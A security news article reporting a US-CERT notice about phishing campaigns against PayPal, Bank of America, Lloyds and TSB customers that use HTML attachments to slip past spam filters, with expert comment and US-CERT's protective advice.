Phishing Scheme Targets PayPal, BofA

Low-Tech Scam Uses Attachments to Fool Spam Filters
Phishing Scheme Targets PayPal, BofA
The United States Computer Emergency Readiness Team, part of the Department of Homeland Security, has issued a notice about ongoing phishing attacks targeting PayPal, Bank of America, Lloyds and TSB users.

The attacks get past spam filters using HTML webpage attachments, rather than traditional phishing e-mails that contain malicious links. "Many browsers utilize anti-phishing filters to help protect users against phishing attacks," US-CERT states. "This method of attack is able to bypass this security mechanism."

US-CERT encourages users and administrators to:

  • Not follow unsolicited links or attachments in e-mail;
  • Use caution when providing personal information online;
  • Verify the legitimacy of e-mail by contacting the sender directly;
  • Review common best practices for avoiding e-mail scams and socially engineered attacks.

Neil Schwartzman, founder and chief security specialist at Montreal-based CASL Consulting, says this mode of so-called attachment attack has been growing and has hit several large organizations, including FedEx and Canada Post, in the last month. "It's not even a sophisticated scheme," Schwartzman says. "It's almost unsophisticated, but it's clever."

Because the phishy HTML pages are e-mailed to unsuspecting recipients as attachments, spam filters have no overt URLs to scan and trap. "You create an HTML page and mail it as an attachment that's called a Word doc or a PDF, to trick the content filters," he says. "It's a way to circumvent the spam filter. The victim gets the e-mail, opens the attachment and then is sent to a legitimate website, before being routed to a site that's not legit, where, of course, the victim is asked to enter some kind of account information" or personal identifier, like a U.S. Social Security number.

"Obviously, PayPal is worried about the theft of actual PayPal credentials," Schwartzman says. But the way these phishy forms are set up, fraudsters are out to bilk what they can out of any company or consumer. "They're phishing for any kind of information that can lead to money, whether it is a Social Security number, a PayPal account or credit card information."

About the Author

Tracy Kitten

Tracy Kitten

Executive Editor, BankInfoSecurity & CUInfoSecurity

A veteran journalist with more than 18 years' experience, Kitten has covered the financial sector for the last 11 years. Before joining Information Security Media Group in 2010, where she now serves as the Executive Editor of BankInfoSecurity and CUInfoSecurity, she covered the financial self-service industry as the senior editor of ATMmarketplace, part of Networld Media. Kitten has been a regular speaker at domestic and international conferences, and was the keynote at ATMIA's U.S. and Canadian conferences in 2009. She has been quoted by, ABC News, and MSN Money.

Around the Network